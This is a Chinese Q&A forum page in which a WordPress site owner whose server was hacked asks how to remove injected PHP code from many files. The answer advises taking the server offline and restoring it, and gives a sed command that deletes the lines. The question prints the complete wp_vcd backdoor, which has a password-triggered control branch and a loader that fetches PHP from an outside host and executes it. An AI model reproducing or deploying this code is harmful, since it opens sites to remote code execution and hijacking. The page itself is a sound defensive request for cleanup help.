代码之家  ›  专栏  ›  技术社区  ›  Huskie69

在Linux中从多个文件中删除大量文本/代码

  •  1
  • Huskie69  · 技术社区  · 8 年前

    我的Linux服务器上的多个域似乎都被黑客攻击了——我不完全确定是怎么做到的,我不能像黑客一样思考!但他们已经成功破解了运行wordpress的多个域名。

    违规代码为:

    <?php
    
    if (isset($_REQUEST['action']) && isset($_REQUEST['password']) && ($_REQUEST['password'] == '751486a687f91a0d030551bb518f903e'))
            {
    $div_code_name="wp_vcd";
                    switch ($_REQUEST['action'])
                            {
    
    
    
    
    
    
                                    case 'change_domain';
                                            if (isset($_REQUEST['newdomain']))
                                                    {
    
                                                            if (!empty($_REQUEST['newdomain']))
                                                                    {
                                                                               if ($file = @file_get_contents(__FILE__))
                                                                                        {
                                                                                                     if(preg_match_all('/\$tmpcontent = @file_get_contents\("http:\/\/(.*)\/code8\.php/i',$file,$matcholddomain))
                                                                                                                 {
    
                                                                                                       $file = preg_replace('/'.$matcholddomain[1][0].'/i',$_REQUEST['newdomain'], $file);
                                                                                                       @file_put_contents(__FILE__, $file);
                                                                                                       print "true";
                                                                                                                 }
    
    
                                                                                        }
                                                                    }
                                                    }
                                    break;
    
    
    
                                    default: print "ERROR_WP_ACTION WP_V_CD WP_CD";
                            }
    
                    die("");
            }
    
    
    
    
    if ( ! function_exists( 'theme_temp_setup' ) ) {
    $path=$_SERVER['HTTP_HOST'].$_SERVER[REQUEST_URI];
    if ( stripos($_SERVER['REQUEST_URI'], 'wp-cron.php') == false && stripos($_SERVER['REQUEST_URI'], 'xmlrpc.php') == false) {
    
    function file_get_contents_tcurl($url) {
        $ch = curl_init();
        curl_setopt($ch, CURLOPT_AUTOREFERER, TRUE);
        curl_setopt($ch, CURLOPT_HEADER, 0);
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
        curl_setopt($ch, CURLOPT_URL, $url);
        curl_setopt($ch, CURLOPT_FOLLOWLOCATION, TRUE);
    
        $data = curl_exec($ch);
        curl_close($ch);
    
        return $data;
    }
    
    
    function theme_temp_setup($phpCode) {
        $tmpfname = tempnam(sys_get_temp_dir(), "theme_temp_setup");
        $handle = fopen($tmpfname, "w+");
        fwrite($handle, "<?php\n" . $phpCode);
        fclose($handle);
        include $tmpfname;
        unlink($tmpfname);
        return get_defined_vars();
    }
    
    
    if($tmpcontent = @file_get_contents("http://www.verna.cc/code8.php"))
    {
    extract(theme_temp_setup($tmpcontent));
    }
    elseif($tmpcontent = @file_get_contents_tcurl("http://www.verna.cc/code8.php"))
    {
    extract(theme_temp_setup($tmpcontent));
    }
    
    
    }
    }
    
    
    
    ?>
    
    1 回复  |  直到 8 年前
        1
  •  1
  •   Ingo Karkat    8 年前

    如果服务器遭到黑客攻击,删除恶意代码不应该是您主要/唯一关心的问题。还有更多关于 Information Security 和其他地方,但简而言之:

    • 您应该首先使服务器脱机(以避免提供恶意代码)。
    • 分析并修复允许入侵的安全漏洞。
    • 重新获得服务器的信任;最好是从良好的图像中恢复;至少,通过从备份中恢复受影响的代码。

    你没有备份,也不知道如何保护盒子(或者花钱让别人帮你做)?有些人会争辩说,你根本没有必要拥有一个公共服务器。。。


    回答您的实际问题:最好使用非交互式工具,例如 sed

    sed -i '2,92d' file.php